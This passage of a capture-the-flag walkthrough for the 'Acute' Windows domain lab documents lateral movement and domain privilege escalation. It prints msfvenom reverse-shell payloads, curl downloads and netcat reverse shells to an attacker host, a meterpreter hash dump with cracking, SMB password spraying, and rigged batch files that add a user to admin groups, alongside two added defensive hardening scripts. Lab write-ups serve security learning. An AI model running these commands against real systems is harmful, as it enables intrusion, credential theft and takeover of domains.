PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51';$passwd = $securepasswd | ConvertTo-SecureString;$creds = New-Object System.Management.Automation.PSCredential("acute\jmorgan", $passwd);Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds}
The term 'ConvertTo-SecureString' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (ConvertTo-SecureString:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

The term 'New-Object' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (New-Object:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

The term 'Invoke-Command' is not recognized as the name of a cmdlet, function, script file, or operable program. Check
the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (Invoke-Command:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

Although it is quite restricted, running wm.ps1 directly turns out to work.

Then it's simple: just replace Get-Volume in wm.ps1 and run wm.ps1 again, which effectively makes jmorgan execute the payload.

Generate another payload. This is a personal habit: I don't like two payloads sharing the same port, because in sessions I distinguish them by port at a glance.
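The weakness the writeup has just laid out is a constrained endpoint (the dc_manage discussion above) whose allowed cmdlets include Set-Content, combined with a script on the DC that a more privileged user later runs: "write a file" became "run code as jmorgan". The following is an added example, not the configuration from the box or from the original writeup, of how such an endpoint can be built as a JEA configuration that does not leave that gap. It assumes it is run from an elevated prompt on the server hosting the endpoint; the group name ACUTE\DC-Operators, the module name DcManage, the role name DcOperator and the transcript folder are assumptions.

```powershell
# Added example, not from the original writeup: a JEA endpoint named like the
# writeup's dc_manage, built so that the role cannot write files or invoke
# scripts. Group, module, role and folder names are assumptions.
# Run elevated on the server that will host the endpoint.

$moduleRoot = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\DcManage'
$rcDir      = Join-Path $moduleRoot 'RoleCapabilities'
New-Item -ItemType Directory -Path $rcDir -Force | Out-Null
# A role capability file is only found by name when it sits inside a module.
New-Item -ItemType File -Path (Join-Path $moduleRoot 'DcManage.psm1') -Force | Out-Null

# 1. Role capability: expose only read-only, non-file cmdlets.
#    Set-Content is left out because the role must not be able to alter a
#    script another identity runs; Get-Content is left out because in the
#    writeup it was enough to read the DPAPI blob in wm.ps1. Nothing is listed
#    under VisibleExternalCommands, so executables and .ps1 files on the host
#    cannot be invoked through the endpoint either.
New-PSRoleCapabilityFile -Path (Join-Path $rcDir 'DcOperator.psrc') `
    -VisibleCmdlets 'Get-Alias', 'Get-ChildItem', 'Get-Command', 'Get-Location', 'Write-Output'

# 2. Session configuration. RestrictedRemoteServer puts the session in
#    NoLanguage mode (callers can invoke visible commands by name but cannot
#    use variables, operators or script text), the virtual account runs the
#    commands under a temporary per-session identity instead of the caller,
#    and transcripts give the SOC a record of every command sent through it.
$psscPath = Join-Path $moduleRoot 'DcManage.pssc'
New-PSSessionConfigurationFile -Path $psscPath `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEA-Transcripts' `
    -RoleDefinitions @{ 'ACUTE\DC-Operators' = @{ RoleCapabilities = 'DcOperator' } }

# A malformed .pssc still registers but yields an endpoint nobody can use.
if (-not (Test-PSSessionConfigurationFile -Path $psscPath)) {
    throw "session configuration file $psscPath is invalid"
}

# 3. Register the endpoint. Its own ACL decides who may connect at all;
#    RoleDefinitions above decides what a connected caller can see.
Register-PSSessionConfiguration -Name 'dc_manage' -Path $psscPath -Force | Out-Null

# 4. Verify from the elevated prompt (ordinary users are denied this cmdlet,
#    which is the behaviour the writeup ran into).
Get-PSSessionConfiguration -Name 'dc_manage' |
    Select-Object Name, Permission, RunAsVirtualAccount, LanguageMode
```

The client-side check is the same one the writeup performed: Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Get-Command } run as a member of the mapped group should list nothing beyond the five cmdlets above. The endpoint configuration is only half of the fix, though: a script that stores another user's DPAPI-protected credential on the DC is itself the problem, and no endpoint ACL makes that safe.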

└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=10089 -f exe -o a.exe
Warning: KRB5CCNAME environment variable not supported - unsetting
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: a.exe

Change the listener port and run it in the background:

msf6 exploit(multi/handler) > set LPORT 10089
LPORT => 10089
[*] Started reverse TCP handler on 10.10.16.4:10089
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >

Use the edavies shell to drop the payload in first:

curl 10.10.16.4/a.exe -o C:/utils/t.exe

Then modify the contents of imonks's wm.ps1 on atsserver, replacing Get-Volume with C:\Utils\t.exe, so that running wm.ps1 runs the msf payload directly:

PS C:\Utils> $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsplainText -Force

PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { (Get-Content -Path ~/desktop/wm.ps1).Replace('Get-Volume', 'C:\Utils\t.exe') | Set-Content -Path ~/desktop/wm.ps1 }

Oddly, after running wm.ps1, msf receives no client connection:

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { C:/Utils/wm.ps1 }

Then I rebooted the machine and dropped an nc on it:

curl 10.10.16.4/nc64.exe -o C:/Utils/b.exe
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { (Get-Content -Path C:\Users\imonks\desktop\wm.ps1).Replace('Get-Volume','C:\Utils\a.exe 10.10.16.4 10088 -e powershell')| Set-Content -Path C:\Users\imonks\desktop\wm.ps1}

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\desktop\wm.ps1 }

And this time a shell comes back. Strange.

└─$ nc -lvnp 10088
listening on [any] 10088 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.145] 49840
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\jmorgan\Documents>
PS C:\Users\jmorgan\Documents> whoami
whoami
acute\jmorgan

Check the current user's privileges: jmorgan is a member of the host's local Administrators group:

PS C:\Users\administrator.ACUTE\downloads> whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

From this nc shell, run the msf payload from earlier to get a Meterpreter session back.

PS C:\utils> start-job -scriptblock {C:\utils\t.exe}
start-job -scriptblock {C:\utils\t.exe}

Id Name PSJobTypeName State HasMoreData Location Command
-- ---- ------------- ----- ----------- -------- -------
1 Job1 BackgroundJob Running True localhost C:\utils\t.exe

This time the session came in.

>sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
55 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.4:10087 -> 10.10.11.145:49877 (172.16.22.2)
56 meterpreter x64/windows ACUTE\jmorgan @ ACUTE-PC01 10.10.16.4:10089 -> 10.10.11.145:49792 (172.16.22.2)

to awallace

Searched around as jmorgan and found nothing of value, so switch to that session and dump the local hashes.

>sessions 56

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::

Run them through hashcat and one of them is a weak password.

└─$ hashcat hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

1000 | NTLM | Operating System

a29f7623fd11550def0192de9246f46b:Password@123

List the current domain users; this has to be run on the domain controller.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net users /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net users /domain}

User accounts for \\

-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.

I wanted to spray the password directly at 172.16.22.1, so first add a route through the session.

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
60 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.8:10087 -> 10.10.11.145:49878 (172.16.22.2)

msf6 exploit(multi/handler) > route add 172.16.22.0 255.255.255.0 60
[*] Route added

Build the user list first.

└─$ grep -Eo '\w+' userlistt
Administrator
awallace
chall
edavies
Guest
imonks
jmorgan
krbtgt
lhopkins
msf6 auxiliary(scanner/smb/smb_login) > set user_file userlistt
user_file => userlistt

Running it directly seems to have a problem.

msf6 auxiliary(scanner/smb/smb_login) > set SMBDomain 'acute.local'
SMBDomain => acute.local
msf6 auxiliary(scanner/smb/smb_login) > rerun
[*] Reloading module...
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session

[*] 172.16.22.1:445 - 172.16.22.1:445 - Starting SMB login bruteforce
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\Administrator:Password@123',
[!] 172.16.22.1:445 - No active DB -- Credential data will not be saved!
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\awallace:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\chall:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\edavies:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\Guest:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\imonks:Password@123',
[-] 172.16.22.1:445 - 172.16.22.1:445 - Failed: 'acute.local\jmorgan:Password@123',

So I fell back to trying each user manually with Invoke-Command.

The good news is that awallace hit right away, so no time was wasted.

$passwd = ConvertTo-SecureString "Password@123" -AsplainText -Force

$cred = New-Object System.Management.Automation.PSCredential("acute\awallace",$passwd)

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls ~ }
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user /domain
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user /domain}

User accounts for \\

-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.

Checking the permissions, what stands out is that the current user is in a Managers group, which is a custom group.

PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {whoami /all}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {whoami /all}

USER INFORMATION
----------------

User Name SID
============== ==============================================
acute\awallace S-1-5-21-1786406921-1914792807-2072761762-1104


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Searched some more, but this time there was nothing in the user's home directory.

Since this user's group is unusual, it has probably been given some special permission.

Looking in Program Files, there is a keepmeon directory.

PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock { ls "\Program Files"}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls "\Program Files"}


Directory: C:\Program Files


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files ATSSERVER
d----- 21/12/2021 00:11 Hyper-V ATSSERVER
d----- 15/09/2018 08:12 internet explorer ATSSERVER
d----- 01/02/2022 19:41 keepmeon ATSSERVER
d----- 21/12/2021 00:04 VMware ATSSERVER
d----- 20/12/2021 21:19 Windows Defender ATSSERVER
d----- 20/12/2021 21:12 Windows Defender Advanced Threat ATSSERVER
Protection
d----- 21/12/2021 14:13 WindowsPowerShell ATSSERVER

"Keep me on", it says (x

It contains a single file, keepmeon.bat.

PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock { ls "\Program Files\keepmeon"}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { ls "\Program Files\keepmeon"}


Directory: C:\Program Files\keepmeon


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER

Its contents are a script that executes every file with a .bat extension.

PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {cat "\Program Files\keepmeon\keepmeon.bat"}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {cat "\Program Files\keepmeon\keepmeon.bat"}

REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)

The comment says it runs every five minutes, and apparently it is Lois who runs it:

REM This is run every 5 minutes. For Lois use ONLY
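From the defender's side, the weakness here is a scheduled runner that executes every .bat under its directory, so anyone who can write into that tree runs code as the scheduling account. The PowerShell audit below is an added example, not part of this writeup or the box; the directory path and the trusted-identity list are assumptions.

```powershell
# Added example, not from the original writeup. Audits a directory whose .bat files a
# scheduled script (like keepmeon.bat) executes: who can write there, and what is there.
# Assumptions: the path and the trusted-identity list are illustrative defaults.
param(
    [string]$Path = 'C:\Program Files\keepmeon',
    [string[]]$TrustedIdentities = @(
        'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'
    )
)

# Rights that let a principal drop, replace or delete a script, or rewrite the ACL.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Get-UntrustedWriters {
    param([string]$Directory, [string[]]$Trusted)
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        if ($Trusted -contains $ace.IdentityReference.Value) { continue }
        [pscustomobject]@{
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Get-ScheduledScripts {
    param([string]$Directory)
    # keepmeon.bat uses "for /R ... (*.bat)", so every .bat in the whole tree runs,
    # not only the ones beside it. Owner and timestamp help spot a dropped file.
    Get-ChildItem -LiteralPath $Directory -Recurse -Filter '*.bat' -File | ForEach-Object {
        [pscustomobject]@{
            Script        = $_.FullName
            LastWriteTime = $_.LastWriteTime
            Owner         = (Get-Acl -LiteralPath $_.FullName).Owner
        }
    }
}

$writers = Get-UntrustedWriters -Directory $Path -Trusted $TrustedIdentities
if ($writers) {
    # On the box in this writeup, a Managers member could write here; that is the finding.
    Write-Warning "Non-administrative principals can write to $Path"
    $writers | Format-Table -AutoSize
} else {
    Write-Host "Only trusted identities can write to $Path"
}
Get-ScheduledScripts -Directory $Path | Format-Table -AutoSize
```

Run it on the host that executes the scheduled script; any row in the first table is a principal that can run code as the scheduling account every five minutes.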

So first find out which user Lois is: list all the users, then check each one's details to find her.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net users /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net users /domain}

User accounts for \\

-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.

Got to lhopkins and found her, but this Lois is only an ordinary domain user..

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net user lhopkins  /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net user lhopkins /domain}
User name lhopkins
Full Name Lois Hopkins
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 14:51:53
Password expires Never
Password changeable 22/12/2021 14:51:53
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/03/2025 13:38:26

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.

But remember this passage from the document:

That is, only Lois has permission to change group membership, contact her if a change is needed, and only Lois can become site admin.

Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.

Curious what "site admin" refers to, I looked at the groups.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net groups /domain}

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Managers
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*Site_Admin
The command completed with one or more errors

Among them there is a Site_Admin group.

PS C:\utils>  Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net group Site_Admin /domain}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net group Site_Admin /domain}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

The group has a comment: it is only to be populated in an emergency, and it supposedly has access to Domain Admins.

Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Let me sort out what we have so far:

  • 1. keepmeon.bat: every 5 minutes Lois presumably runs this script, which in turn runs the other .bat files
  • 2. Only Lois can become site admin
  • 3. The Site_Admin group has access to Domain Admins

Although lhopkins is an ordinary domain user, I suspected she is granted Site_Admin every 5 minutes and then runs the bat.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock {net user lhopkins  /domain}

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {net user lhopkins /domain}
User name lhopkins
Full Name Lois Hopkins
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 14:51:53
Password expires Never
Password changeable 22/12/2021 14:51:53
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/03/2025 13:58:26

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.

PS C:\utils>
PS C:\utils> date
date

14 March 2025 14:01:27

So I sat and waited for her 5-minute logon to catch her group membership, but after 5 minutes her groups were still only Domain Users, so this user is not being granted Site_Admin.

The doc does explicitly say Lois can change users' group membership, so just try it directly.

So I wrote a bat: since she runs the bat files every 5 minutes, try adding a user whose credentials we know and who can reach ATSSERVER to a group. Either awallace or imonks would do; I picked awallace.

I wrote three bats:

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\as.bat" -Value "net group site_admin awallace /add /domain" }
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\asss.bat" -Value "net group 'domain admins' awallace /add /domain" }
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\ass.bat" -Value "net group 'key admins' awallace /add /domain" }

After a while, awallace had been added to Site_Admin, so the bat did run; oddly, the ones adding to Domain Admins and Key Admins seem not to have taken effect.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock {  net user awallace /domain}
User name awallace
Full Name Aileen Wallace
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 14:50:36
Password expires Never
Password changeable 22/12/2021 14:50:36
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/03/2025 14:29:59

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *Managers
*Site_Admin
The command completed successfully.

My guess is that Lois has been given some odd DACL permission that lets her add users to the Site_Admin group but not to the other groups.

After a bit of testing I found the membership gets reset, so while awallace still has Site_Admin, quickly add a user.

Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ConfigurationName dc_manage -scriptblock {net user flower Password@123 /add /domain} 
The command completed successfully.
Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ConfigurationName dc_manage -scriptblock { net group "domain admins" flower /add /domain }

When running commands as the newly added user, do not pass -ConfigurationName; otherwise it also reports access denied.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred  -ScriptBlock { ls ~ }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls ~ }
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more
information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

Log in and run it:

PS C:\utils> $passwd = ConvertTo-SecureString "Password@123" -AsplainText -Force
$passwd = ConvertTo-SecureString "Password@123" -AsplainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential("acute\flower",$passwd)
$cred = New-Object System.Management.Automation.PSCredential("acute\flower",$passwd)
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { ls ~ }
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { ls ~ }

Directory: C:\Users\flower

Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d-r--- 15/09/2018 08:12 Desktop ATSSERVER
d-r--- 11/03/2025 15:10 Documents ATSSERVER
d-r--- 15/09/2018 08:12 Downloads ATSSERVER
d-r--- 15/09/2018 08:12 Favorites ATSSERVER
d-r--- 15/09/2018 08:12 Links ATSSERVER
d-r--- 15/09/2018 08:12 Music ATSSERVER
d-r--- 15/09/2018 08:12 Pictures ATSSERVER
d----- 15/09/2018 08:12 Saved Games ATSSERVER
d-r--- 15/09/2018 08:12 Videos ATSSERVER

Grab the flag:

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat \users\administrator\desktop\root*}
283d1a4d4afc079410a74a9f5529e413

After a while the permissions were reset again; unbelievable.

Waited a bit and got the permission back; this time I used awallace directly. Same caveat as before: once you have high privileges, stop specifying ConfigurationName, or it will restrict the commands you can run.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage  -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}
Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}
The term 'curl.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (curl.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

Upload nc to ATSSERVER:

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ScriptBlock { curl 10.10.16.8/nc64.exe -o C:/a.exe}

Run it:

PS C:\utils>Invoke-Command -ComputerName ATSSERVER -Credential $cred  -ScriptBlock { C:/a.exe 10.10.16.8 10088 -e powershell}

Finally, a shell on the ATSSERVER machine:

└─$ nc -lvnp 10088
